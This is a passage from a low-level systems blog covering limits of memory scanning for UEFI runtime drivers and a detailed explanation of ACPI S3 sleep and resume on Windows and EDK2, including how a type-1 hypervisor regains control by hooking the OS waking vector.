Secondly, runtime drivers can hide from this approach easily by writing trampoline code at the beginning of the original runtime service, instead of replacing the pointer in EFI_RUNTIME_SERVICES, or by nullifying the PE header. Those may be mitigated with more intelligent analysis and dumping, but is an easy countermeasure against scanning. 

Thirdly, as a general challenge with memory analysis, classifying memory dumped files is not straightforward. Because memory contents can slightly vary between boots because of relocation (code patches), hash values change each time. Fuzzy hashing such as ssdeep is required to classify dump files and build a useful database. Also, a dump file does not contain driver's name and GUID as found in the actual firmware.

Finally, this is Windows-specific and hacky. It depends heavily on Windows implementation details which may break soon. While PoC worked fined with multiple devices, I would not be comfortable deploying this logic for millions of systems.  

So why did I do this?

I encountered a bug in one of OEM runtime drivers and thought I would tool something quick, but in Rust :) 

References

Monday, November 16, 2020

S3 Sleep, Resume and Handling Them with Type-1 Hypervisor

This post explains how the system enters and resumes from S3 (Sleep) on a modern x86-64 system, by reviewing specifications and the implementation of Windows as an example. This post also outlines challenges with S3 for type-1 hypervisors and how to work around it.
TeaTea in the S3 state

Why S3 is Interesting

On normal system startup, UEFI-based system firmware goes through four execution phases before starting the OS. Those phases include Driver eXecution Environment (DXE), Boot Device Selection (BDS), and Transient System Load (TSL) where system configurations are set and 3rd party firmware modules may be executed. The S3 resume boot path, on the other hand, those phases are skipped for faster start-up. 

This has significant security implications because the S3 resume boot path needs to reapply the same security configurations as they are made during the normal boot path, using entirely different code. Failure of doing it securely leads to vulnerabilities, for example, unauthorized modification of a system firmware image if a firmware write-protection bit is not reapplied during resume. 

Also, for the type-1 hypervisor that is loaded during the TSL phase, lack of the that phase means it is unable to get loaded on resume. Since the processors were shutdown on S3, processor-based virtualization features such as Intel VT-x stop working after resume even though the hypervisor module remains mapped in memory. This needs to be handled. 

High-Level Flow

Before diving into details, let us review a high-level flow of S3 sleep and resume. The followings are the highlights.
  1. Setting certain bits in the registers called Power Management (PM) 1 Control registers, or PM1a_CNT_BLK / PM1b_CNT_BLK puts the system into the S3 state.
  2. During the next system start-up, system firmware detects that shutdown was because of S3 and executes the S3 resume boot path, instead of the normal boot path.
  3. System firmware executes a collection of commands, called boot scripts, and code pointed by the Firmware Waking Vector in the ACPI table. This latter is called an OS waking vector and set up by the OS prior to entering S3.
  4. The waking vector resumes execution of the OS.

Entering S3

The platform enters S3 when software sets 1 to the SLP_EN bits and 5 (0b101) to the SLP_TYP bits in the PM1 control registers. Looking at the ACPI specification, it states that settings the SLP_EN triggers state transition. 
Table 4.13: PM1 Control Registers Fixed Hardware Feature Control, from the ACPI spec
The explanation of the SLP_TYP bits in the table is not crystal clear, but it becomes more obvious with the specification of the Intel platform. The below is an excerpt from the table under 4.2.2 Power Management 1 Control (PM1_CNT) in one of the hardware models that implement ACPI.
 From Intel 495 Series Chipset Family On-Package Platform Controller Hub volume 2

Then, where are those registers? The ACPI does not define it but does define the way to locate them. Under 4.8.3 PM1 Control Registers, it states that
Each register block has a unique 32-bit pointer in the Fixed ACPI Table (FADT) to allow the PM1 event bits to be partitioned between two chips.
The below are excerpts of the FADT format, which contains multiple fields indicating where the registers are. 
...
...
Depending on the implementation of ACPI, some fields may be unused. On my system, the SLEEP_CONTROL_REG field in the table tells that the register is located at IO-port 0x1804. 

RWEverything parsing the FACP table on Windows

So far, we learned that: 
  • the system enters S3 state when software sets SLP_EN and SLP_TYP bits in the PM1 control register.
  • the PM1 control register can be located through the FADT ACPI table. 
Note that the ACPI table itself can be easily located with platform specific ways, such as /sys/firmware/acpi on Linux, GetSystemFirmwareTable() on Windows, or EfiLocateFirstAcpiTable() on UEFI.

Resuming from S3

On system start-up, system firmware executes the same initialization path as the normal boot path, and then, diverges when it detects that the previous shutdown was entering S3. This resume-specific path is called the S3 resume boot path and well explained in the UEFI Platform Initialization (PI) specification. 

In a nutshell, the S3 resume boot path executes the boot scripts to re-initialize the platform, instead of executing the last three boot phases: DXE, BDS and TSL. The boot scripts are saved in non-volatile storage and replicate platform configuration made during normal boot. The below illustration from the spec highlights differences between normal and S3 resume boot paths, as well as how boot scripts are saved and consumed.
Normal and S3 resume boot paths, from the PI spec
As illustrated, after boot scripts are executed, an OS waking vector is executed to resume execution of the OS on the S3 resume boot path. The OS waking vector is the very first OS-specific code (the code that is developed by the OS vendor, and not part of system firmware). This is typically 16bit real-mode code that changes the processor mode to the long mode, resets registers to the same values as what they had before the system entered S3, and lets the OS execute further restoration code to fully resume the system. The OS sets up this OS waking vector right before entering S3. 

How the OS sets up the OS waking vector and how system firmware finds its location? Again, ACPI defines the way. 

The Firmware ACPI Control Structure (FACS) table defines a field called Firmware Waking Vector. This is where the OS should write the address of the OS waking vector to it, and system firmware should read it to locate and execute the OS waking vector. 
Firmware Waking Vector in FACS, from the ACPI spec

To summarize the flow in the chronological order:
  1. OS writes an address of the OS waking vector (ie, bootstrap code) to the Firmware Waking Vector field of the FACS table before entering S3.
  2. System firmware reads the field to know the address of the OS waking vector and transfers execution to the address during the S3 resume boot path.
  3. The OS waking vector eventually resumes system states using configurations kept in memory.

Implementation on Windows and EDK2

Let us look into how the above we reviewed are implemented on Windows (build 18362) and EDK2. 
EDK2 is a reference implementation of UEFI, the system firmware specification, and very commonly used as a base of commercial system firmware. 

Entering S3

On Windows, HaliAcpiSleep() is the main function that implements S3 handling and is called on all processors when a user requests entering S3. It roughly does the following in the order. 
  1. Boot strap processor (BSP) sets up the OS waking vector with HalpSetupRealModeResume().
    *HalpWakeVector = HalpLowStubPhysicalAddress; // // Where HalpWakeVector is the address of the // Firmware Waking Vector field in the FACS table, // initialized at HaliInitPowerManagement() //
  2. BSP waits for all APs to complete saving their states.
    InterlockedAdd(&HalpFlushBarrier, 1);
    while (HalpFlushBarrier != ProcessorCount);
  3. Application processors (APs) save their registers with HalpSaveProcessorState().
  4. APs enter the loop that does not exit in a successful path in HalpFlushAndWait().
    InterlockedIncrement(&HalpFlushBarrier);
    while (HalpFlushBarrier);
  5. BSP writes to the PM1 control register(s) to set the following values with HalpAcpiPmRegisterWrite().
    • SLP_TYP = 5 (S3)
    • SLP_EN = 1 
This puts the system into the S3 state. Let us look into the resume path.

Resuming from S3

  1. On the EDK2, system firmware, side, the S3 resume boot specific execution flow looks roughly like this.
    ...
      -> DxeLoadCore()
           -> S3RestoreConfig2()
                -> S3ResumeExecuteBootScript()
                     -> S3BootScriptExecutorEntryFunction()
  2. S3BootScriptExecutorEntryFunction() executes the boot script and jumps to the OS waking vector as indicated by Facs->FirmwareWakingVector at the end.
  3. The OS waking vector is a copy of HalpRMStub. This eventually brings the execution of BSP to the right after HalpSetupRealModeResume() with RAX=1, as if it returned from the function. 
  4. BSP wakes up other APs by sending INIT-SIPI-SIPI.
    // // This wakes up all APs with HalStartNextProcessor() calls //
    HalpAcpiPostSleep(...);     
  5. The INIT-SIPI-SIPI brings APs to the right after HalpSaveProcessorState() with RAX=1, as if it returned from the function. For more details on how INIT-SIPI-SIPI starts up APs, please read the previous post
  6. All BSP and APs call HalpPostSleepMP() to restore other platform states, then return from HaliAcpiSleep(), continuing OS execution as usual
If you are interested in how exactly the OS waking vector is set up and resumes the system states, I suggest reversing the HaliAcpiSleep() on your own. The way it factors code to keep the flow as straightforward as possible is a masterpiece.  

Note that on VMware, step 1 of the pre-S3 and step 1-3 of the post-S3 steps are skipped. Windows on VMware dose not need them either as the VMware hypervisor directly restores system states, instead of going through the full S3 resume boot path. 

Handling S3 with Type-1 Hypervisor

As mentioned previously, S3 is a challenge for the type1 hypervisor that is loaded during the TSL phase because,
  • On resume, the TSL phase is skipped and no opportunity to get called.
  • On resume, virtualization is disabled and needs to be enabled.
  • It cannot add its boot script to trigger reinitialization, because it is locked at the TSL phase already. 
One may employ the guest support module that subscribes the resume event and notifies the hypervisor to trigger reinitialization, but it is neither secure, portable, nor reliable. Another quick-and-dirty way is to disable S3 by altering the ACPI table, which has an obvious user experience issue.    

The much superior way is to hook the OS waking vector. This works as following:
  1. The hypervisor intercepts IO access to the PM1 control register(s)
  2. When the guest attempts to write to the register to enter sleep, the hypervisor 
    1. overwrites contents of the Firmware Waking Vector field with its own waking vector address, and
    2. writes to the register and lets the system enter S3
  3. When the system wakes up, hypervisor's waking vector is executed, and it
    1. reenables virtualization (with VMXON for example) 
    2. sets up the guest state to emulate execution of guest's waking vector (ie, guest's RIP is set to the guest waking vector)
    3. launches the guest (with VMLAUNCH for example)
Hypervisor resuming from S3

This way, the hypervisor can take control over the system before running any OS (guest) specific code. Implementation of this can be found in multiple hypervisors such as ACRN Embedded Hypervisor and Bitvisor.  

For completeness, noting that the type1 hypervisor that is part of an OEM firmware image or PEI modules does not have to do any of those. If the module were part of the OEM image, it would be able to add a boot script to register reinitialization, and if the module were a PEI module, it would be executed even in the S3 resume boot path. 

Conclusion

Entering and resuming from S3 is complex work that involves all OS, system firmware, and hardware implementation, as well as multiple specifications such as PI and ACPI. However, studying it allows us to familiarize ourselves with the industry standards and intriguing low-level implementation details.  

As a side note, I recommend learning type-1 hypervisors over OS kernel-based ones. Type-1 hypervisor is not just more flexible, it lets you understand greater details of how the system works (and arguably is a more common design across production-level hypervisors). I am still suspending the registration of the public hypervisor development class, but looking into reopening it sometime in the next year as a remote class. If you are interested, please reach out to tanda.sat@gmail.com for details.  

References

EDIT

  • Nov 25 - Correct that the boot phase relevant to 3rd party type 1 hypervisor is TSL and not BDS.